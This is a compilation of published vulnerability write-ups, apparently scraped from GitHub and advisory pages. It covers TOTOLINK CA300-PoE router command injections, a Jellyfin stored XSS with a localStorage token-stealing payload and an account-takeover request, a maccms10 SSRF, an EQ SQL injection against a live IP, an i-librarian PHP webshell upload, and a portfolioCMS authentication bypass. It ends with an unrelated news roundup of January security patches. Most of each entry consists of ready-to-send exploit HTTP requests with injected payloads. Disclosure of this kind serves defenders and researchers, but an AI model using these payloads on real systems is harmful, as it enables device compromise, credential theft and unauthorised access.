TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the setUnloadUserData function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin\_version parameter in the function setUnloadUserData****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUnloadUserData.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"}
    

Folder created successfully

CVE-2023-24145: CVE-vulns/setUnloadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the NTPSyncWithHost function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host\_time parameter in the function NTPSyncWithHost****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in NTPSyncWithHost.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}
    

Folder created successfully

CVE-2023-24138: CVE-vulns/NTPSyncWithHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingNum": "4||ls;"}

CVE-2023-24140: CVE-vulns/setNetworkDiag_NetDiagPingNum.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the minute parameter in the setRebootScheCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setRebootScheCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "minute": "';mkdir /minute_1111;'"}
    

    int __fastcall setRebootScheCfg(int a1, int a2, int a3)
    {
      int mode_v; // $s5
      int week_v; // $s3
      const char *hour_v; // $fp
      const char *minute_v; // $s7
      int recHour_v; // $s0
      int v9; // $v0
      int v11; // $v0
      int i; // $s0
      _BYTE *v13; // $v0
      char *v14; // $a0
      int v15; // $s0
      int v16; // $s0
      char v19[256]; // [sp+2Ch] [-244h] BYREF
      char v20[128]; // [sp+12Ch] [-144h] BYREF
      char v21[128]; // [sp+1ACh] [-C4h] BYREF
      int v22[16]; // [sp+22Ch] [-44h] BYREF
    
      memset(v20, 0, sizeof(v20));
      memset(v21, 0, sizeof(v21));
      memset(v19, 0, sizeof(v19));
      mode_v = websGetVar(a2, "mode", "0");
      week_v = websGetVar(a2, "week", "");
      hour_v = (const char *)websGetVar(a2, "hour", "");
      minute_v = (const char *)websGetVar(a2, "minute", "");
      recHour_v = websGetVar(a2, "recHour", "0");
      cs_uci_set("system.reboot.mode", mode_v);
      cs_uci_set("system.reboot.week", week_v);
      cs_uci_set("system.reboot.hour", hour_v);
      cs_uci_set("system.reboot.minute", minute_v);
      cs_uci_set("system.reboot.recHour", recHour_v);
      cs_uci_commit("system");
      strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
      CsteSystem(v19, 0);
      CsteSystem("killall sche_reboot", 0);
      v9 = atoi(mode_v);
      if ( v9 == 1 )                                // mode=1
      {
        v11 = atoi(week_v);
        if ( v11 == 255 )
        {
          strcpy(v21, "*");
        }
        else if ( v11 )
        {
          for ( i = 1; i != 8; ++i )
          {
            if ( ((atoi(week_v) >> i) & 1) != 0 )
            {
              sprintf(v20, (const char *)&dword_4404, i);
              strcat(v21, v20);
              strcat(v21, &dword_4408);
            }
          }
          v13 = (_BYTE *)strrchr(v21, 44);
          if ( v13 )
            *v13 = 0;
        }
        sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
        v14 = v19;
    LABEL_13:
        CsteSystem(v14, 0);
        goto LABEL_3;
      }
      if ( v9 == 2 )
      {
        v15 = atoi(recHour_v);
        if ( v15 > 0 )
        {
          sysinfo(v22);
          v16 = 3600 * v15 - v22[0];
          if ( v16 <= 0 )
          {
            cs_cmd("reboot", 16464, 1);
            goto LABEL_3;
          }
          CsteSystem("killall sche_reboot", 0);
          sprintf(v20, "sche_reboot %ld &", v16);
          v14 = v20;
          goto LABEL_13;
        }
      }
    LABEL_3:
      cs_cmd("/etc/init.d/cron", "restart", 2);
      websSetCfgResponse(a1, a3, "0", "reserv");
      return 0;
    }

CVE-2023-24146: CVE-vulns/setRebootScheCfg_minute.md at main · Double-q1015/CVE-vulns

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

CVE-2023-23635: Security Advisory usd- 2022-0031 | usd HeroLab

maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF).

#CVE-2022-47872

maccms10 admin+ ssrf attacks

Overview

Manufacturer's website information：https://maccms.pro

Source code download address ： https://github.com/maccmspro/maccms10.git

Affected version: V2021.1000.2000

2.Vulnerability details

maccmspro/maccms10#22

Enter the background, click Collect --> Custom interface --> Interface address,

In the name box into payload1:http://7ca8e96e.dns.1433.eu.org.

It can cause ssrf attacks.

Vulnerability name：ssrf attacks

Vulnerability level：Medium risk

Vulnerability location： click Collect --> Custom interface --> Interface address

3.Recurring vulnerabilities and

POST http://192.168.52.163/admin.php/admin/collect/info.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0

Accept: _/_

AcceptLanguage: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding:gzip,deflate

Content-Type: applicat ion/ x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 226

Origin: http://192.168.52.163

Connection: close

Referer: http://192.168.52.163/admin.php/admin/collect/info.html

Cookie: PHPSESSID=gn328q2i2ruajsh96qoll65ia7

collect\_id=&_token_\=8d639020c85bde89f9276381d2460046&collect\_name=1111&collect\_url=http%3A%2F%2F7ca8e96e.dns.1433.eu.org.&collect\_param=%26q%3D1&collect\_type=1&collect\_mid=1&collect\_opt=Ø&collect\_filter=0&collect\_filter\_from=

CVE-2022-47872: CVE-2022-47872/README.md at main · Cedric1314/CVE-2022-47872

EQ v1.5.31 to v2.2.0 was discovered to contain a SQL injection vulnerability via the UserPwd parameter.

**EQ**

Exploit Title:EQ企业管理系统

Version:EQ v1.5.31 to v2.2.0

Date:December 5, 2022

Exploit Author:TLF

analysis report: EQ企业管理系统 v1.5.31 to v2.2.0 was discovered to contain a SQL injection

poc

POST /Account/Login HTTP/1.1

Host: 121.8.146.131

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: application/json, text/javascript, /; q=0.01

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 61

Origin: http://121.8.146.131

Connection: close

Referer: http://121.8.146.131/Account/Login

Cookie: ASP.NET\_SessionId=v2svw4yucv1wxfah1zvwsyxy

UserNumber=admin';WAITFOR DELAY '0:0:5'--&UserPwd=123456&ServerDB=EQ&RememberPwd=false&UserPwd=123456&ServerDB=EQ&RememberPwd=false

Patches:None

CVE-2022-45297: GitHub - tlfyyds/EQ

i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.

**Summary**

The $\_POST\['filename'\] is not filtered so that the php suffix file can be uploaded across directories.

**Detail**

Using the replace PDF function, an attacker can upload a file with php as the suffix and %PDF as the beginning of file content to any directory by controlling the filename parameter.

    if (in_array($file_extension, array('doc', 'docx', 'vsd', 'xls', 'xlsx', 'ppt', 'pptx', 'odt', 'ods', 'odp')))
    ...
    ...
    else
    move_uploaded_file($_FILES['form_new_file']['tmp_name'], IL_TEMP_PATH . DIRECTORY_SEPARATOR . 'lib_' . session_id() . DIRECTORY_SEPARATOR . $_POST['filename']);
    

**POC**

like this

    POST /ajaxsupplement.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------36332819052109193833351732483
    Content-Length: 981
    Origin: http://127.0.0.1
    DNT: 1
    Connection: close
    Referer: http://127.0.0.1/index2.php
    Cookie: PHPSESSID=i7l1jt5cp8bbgt41p888aii2r7
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="file"
    
    1
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="filename"
    
    ../../z.php
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="form_new_file"; filename="1.php"
    Content-Type: application/pdf
    
    %PDF
    <?php phpinfo();?>
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="form_new_file_link"
    
    
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="form_graphical_abstract"
    
    
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="form_supplementary_file[]"
    
    
    -----------------------------36332819052109193833351732483
    Content-Disposition: form-data; name="proxystr"
    
    
    -----------------------------36332819052109193833351732483--

CVE-2022-47854: Arbitrary file upload in ajaxsupplement.php · Issue #155 · mkucej/i-librarian

Westbrookadmin portfolioCMS v1.05 allows attackers to bypass password validation and access sensitive information via session fixation.

allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page.

GET /portfolioCMS-master/admin/setup.php HTTP/1.1  
Host: 172.16.100.15  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Refere:http://172.16.100.15/portfolioCMS-master/admin/  
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; admin\_username=admin; PHPSESSID=u25c0656jai48kjhvo27kl2loq  
Upgrade-Insecure-Requests: 1

CVE-2020-20402: allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page. · Issue #2 · Westbrookadmin/portfolioCMS

January saw a slew of security patches for iOS, Chrome, Windows, and more.

The Android security patch is available to Google’s Pixel devices, which have their own specific updates, and Samsung’s Galaxy range, including Samsung Galaxy Note 10, Galaxy S21, and Galaxy A73. You can check for the update in your settings.

Microsoft Patch Tuesday

Microsoft fixed a rather hefty 98 security issues in its first Patch Tuesday of the year, including an already exploited vulnerability: CVE-2023-21674 is an elevation of privilege flaw impacting the Windows Advanced Local Procedure Call that could lead to browser sandbox escape. 

By exploiting the bug, an adversary could gain System privileges, Microsoft wrote, confirming that the flaw has been detected in real-life attacks.

Another elevation of privilege vulnerability in the Windows Credential Manager User Interface, CVE-2023-21726, is relatively easy to exploit and doesn’t require any interaction from the user.

January’s Patch Tuesday also saw Microsoft fix nine Windows Kernel vulnerabilities, eight of which are elevation of privilege issues and one information disclosure vulnerability.

Mozilla Firefox

Software firm Mozilla has released important updates for its Firefox browser, the most serious of which have been the subject of a warning by the US Cybersecurity and Infrastructure Security Agency (CISA). 

Among the 11 flaws fixed in Firefox 109 are four rated as having a high impact, including CVE-2023-23597, a logic bug in process allocation that could allow adversaries to read arbitrary files. Meanwhile, Mozilla said its security team found memory safety bugs in Firefox 108. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort, some could have been exploited to run arbitrary code,” it wrote.

An attacker could exploit some of these vulnerabilities to take control of an affected system, CISA said in its advisory. “CISA encourages users and administrators to review Mozilla’s security advisories for Firefox ESR 102.7 and Firefox 109 for more information and apply the necessary updates.”

VMWare

Enterprise software maker VMWare has published a security advisory detailing four flaws affecting its VMware vRealize Log Insight product. Tracked as CVE-2022-31706, the first is a directory traversal vulnerability with a CVSSv3 base score of 9.8. By exploiting the flaw, an unauthenticated, malicious actor could inject files into the operating system of an impacted appliance, resulting in RCE, VMWare says.

Meanwhile, a broken access control RCE vulnerability tracked as CVE-2022-31704 also has a CVCCv3 base score of 9.8. It goes without saying that those impacted by these vulnerabilities should patch as soon as possible.

Oracle

Software giant Oracle has released patches for a whopping 327 security vulnerabilities, 70 of which are rated as having a critical impact. Worryingly, 200 of the issues patched in January can be exploited by a remote unauthenticated attacker.

Oracle is recommending that people update their systems as soon as possible, warning that it has received reports of “attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches.”

In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches, it says.

SAP

SAP’s January Patch Day has seen the release of 12 new and updated security notes. With a CVSS score of 9.0, CVE-2023-0014 is rated as the most severe bug by security firm Onapsis. The flaw affects the majority of all SAP customers and its mitigation is a challenge, Onapsis says. 

The capture-replay vulnerability is a risk because it could allow malicious users to obtain access to an SAP system. “Complete patching of the vulnerability includes applying a kernel patch, an ABAP patch, and a manual migration of all trusted RFC and HTTP destinations,” Onapsis explains.

Tag

#firefox